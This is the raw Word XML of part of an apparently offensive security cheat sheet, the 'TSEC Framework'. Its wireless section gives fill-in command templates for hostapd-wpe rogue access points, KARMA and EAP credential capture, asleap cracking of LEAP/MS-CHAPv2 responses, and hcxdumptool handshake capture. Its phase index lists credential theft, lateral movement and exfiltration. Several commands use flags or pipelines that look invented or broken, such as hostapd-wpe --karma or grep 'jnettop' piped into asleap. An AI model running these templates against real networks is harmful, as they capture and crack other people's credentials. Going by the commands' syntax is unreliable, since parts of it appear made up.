    <w:bookmarkStart w:id="132" w:name="tool-10.8-hostapd-wpe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.8 — hostapd-wpe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rogue access point for enterprise wireless attacks.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Rogue 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hostapd-wpe {config_file} &gt; /opt/tsec/output/10.8.1_hostapd_rogue.log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SSID Spoof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 -i 's/^ssid=.*/ssid={target_ssid}/' /etc/hostapd-wpe/hostapd-wpe.conf &amp;&amp; hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf &gt; /opt/tsec/output/10.8.2_hostapd_spoof.log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hostapd-wpe -c {channel} {config_file} &gt; /opt/tsec/output/10.8.3_hostapd_channel.log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KARMA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hostapd-wpe --karma {config_file} &gt; /opt/tsec/output/10.8.4_hostapd_karma.log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EAP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hostapd-wpe --eap {config_file} &gt; /opt/tsec/output/10.8.5_hostapd_eap.log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hostapd-wpe -o /opt/tsec/output/10.8.6_hostapd.log {config_file}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hostapd-wpe --cert {cert_file} --key {key_file} {config} &gt; /opt/tsec/output/10.8.7_hostapd_cert.log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SSID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hostapd-wpe --broadcast {config_file} &gt; /opt/tsec/output/10.8.8_hostapd_broadcast.log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{log_file} \| grep 'jnettop' \| asleap -C {challenge} -R {response} -W {wordlist} &gt; /opt/tsec/output/10.8.9_hostapd_analysis.txt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Enterprise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hostapd-wpe --karma --eap -o /opt/tsec/output/10.8.10_hostapd_full.log {config} &amp;&amp; asleap -C {chall} -R {resp} -W {wordlist} &gt; /opt/tsec/output/10.8.10_hostapd_crack.txt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32"/>
    <w:bookmarkStart w:id="133" w:name="tool-10.9-asleap"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.9 — asleap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LEAP and MS-CHAPv2 wireless authentication password recovery.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asleap -C {challenge} -R {response} -W {wordlist} &gt; /opt/tsec/output/10.9.1_asleap_crack.txt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asleap -G -W {wordlist} -D /opt/tsec/output/10.9.2_asleap_table.dat &gt; /opt/tsec/output/10.9.2_asleap_generate.txt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asleap -C {challenge} -R {response} -D /opt/tsec/output/10.9.2_asleap_table.dat &gt; /opt/tsec/output/10.9.3_asleap_lookup.txt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 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asleap -r {capture}.pcap -W {wordlist} &gt; /opt/tsec/output/10.9.4_asleap_pcap.txt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SSID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asleap -r {capture}.pcap -W {wordlist} -S {ssid} &gt; /opt/tsec/output/10.9.5_asleap_ssid.txt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LEAP Attack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asleap -C {challenge} -R {response} -W {wordlist} -L &gt; /opt/tsec/output/10.9.6_asleap_leap.txt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asleap -C {challenge} -R {response} -W {wordlist} -v &gt; /opt/tsec/output/10.9.7_asleap_verbose.txt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Wordlists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asleap -C {challenge} -R {response} -W {wordlist1} -W {wordlist2} &gt; /opt/tsec/output/10.9.8_asleap_multi.txt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 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asleap -r {capture}.pcap -W {wordlist} -o /opt/tsec/output/10.9.9_asleap_batch.txt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asleap -r {capture}.pcap -W {wordlist} -D {precomputed} -o /opt/tsec/output/10.9.10_asleap_full.txt -v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</w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:id="134" w:name="tool-10.10-hcxdumptool"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 10.10 — hcxdumptool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Packet capture from WLAN devices for hashcat cracking.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{interface} -o /opt/tsec/output/10.10.1_hcxdump_basic.pcapng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{interface} -o /opt/tsec/output/10.10.2_hcxdump_status.pcapng --enable_status=15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/opt/tsec/output/10.10.3_hcxdump_filter.pcapng --filterlist_ap={mac_file} --filtermode=2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Beacon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/opt/tsec/output/10.10.4_hcxdump_beacon.pcapng --active_beacon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Deauth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/opt/tsec/output/10.10.5_hcxdump_deauth.pcapng --enable_status=15 --bpfc={bssid}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/opt/tsec/output/10.10.6_hcxdump_channels.pcapng --channel=1,6,11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/opt/tsec/output/10.10.7_hcxdump_assess.pcapng --do_rcascan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/opt/tsec/output/10.10.8_hcxdump_extended.pcapng --enable_status=63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/opt/tsec/output/10.10.9_hcxdump_gps.pcapng --use_gpsd=localhost:2947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hcxdumptool -i {iface} -o /opt/tsec/output/10.10.10_hcxdump_full.pcapng --enable_status=15 --active_beacon --channel=1,6,11 &amp;&amp; hcxpcapngtool -o /opt/tsec/output/10.10.10_hcxconv_full.22000 /opt/tsec/output/10.10.10_hcxdump_full.pcapng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8" w:name="quick-reference-matrix"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quick Reference Matrix</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="135" w:name="command-index-by-phase"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command Index by Phase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4"/>
        <w:gridCol w:w="1405"/>
        <w:gridCol w:w="1532"/>
        <w:gridCol w:w="1916"/>
        <w:gridCol w:w="21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Reconnaissance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Passive/active intelligence gathering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Surface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discovery and service enumeration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vulnerability scanning and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 Development &amp;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 creation and payload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Elevating access rights on compromised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Stealing passwords, hashes, and Kerberos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between systems in the target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 &amp; Defense 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Maintaining access and avoiding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collection, exfiltration, and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 Hacking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Wi-Fi, Bluetooth, and RF security assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="tool-naming-convention"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool Naming Convention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{Phase}.{Tool}.{Mode}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: 6.1.1 = Phase 6, Tool 1, Mode 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">         (Credential Access, Mimikatz, Logon Passwords)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="136"/>
    <w:bookmarkStart w:id="137" w:name="output-naming-convention"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output Naming Convention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tsec/output/{Phase}.{Tool}.{Mode}_{tool_name}_{target}.{ext}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: /opt/tsec/output/6.1.1_mimikatz_passwords.txt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usage-notes"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usage Notes</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="139" w:name="prerequisites"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All tools must be installed and accessible in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$PATH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Required directories must exist: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/opt/tsec/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{output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wordlists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scripts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configs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tools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projects}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="139"/>
    <w:bookmarkStart w:id="140" w:name="placeholder-variables"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Placeholder Variables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{target}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IP address, hostname, or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{domain}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domain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{lhost}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Attacker/listener IP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{lport}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Attacker/listener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{port}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port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{interface}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interface (e.g., wlan0, eth0)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{wordlist}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wordlist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{username}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 for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{password}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for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{hash}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{ntlm_hash}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 for pass-the-hash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{payload}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payload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{shellcode}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shellcode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{bssid}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access point MAC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{channel}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channel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{session}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session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{agent}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Empire/Mythic agent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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkStart w:id="141" w:name="important-disclaimers"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Important Disclaimers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING: This framework is designed exclusively for authorized security testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unauthorized access to computer systems is illegal under various laws including the Computer Fraud and Abuse Act (CFAA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Always obtain written authorization before testing any system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use these tools only on systems you own or have explicit permission to test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The authors assume no liability for misuse of this framework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The TSEC Framework — Version 1.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Last Updated: 2026-06-29</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Total Coverage: 10 Phases | 100 Tools | 1,000 Commands</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkEnd w:id="14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2026-06-29T10:32:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-29T10:32:05Z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913l48ko3g9infrn9kg-19f12b6a-3742-8e48-8000-09de5cac9778-20260629103205","ReservedCode1":"","ContentPropagator":"001191110108MACG2KBH8F20000","PropagateID":"d913l48ko3g9infrn9kg-19f12b6a-3742-8e48-8000-09de5cac9778-20260629103205","ReservedCode2":""}</vt:lpwstr>
  </property>
</Properties>
</file>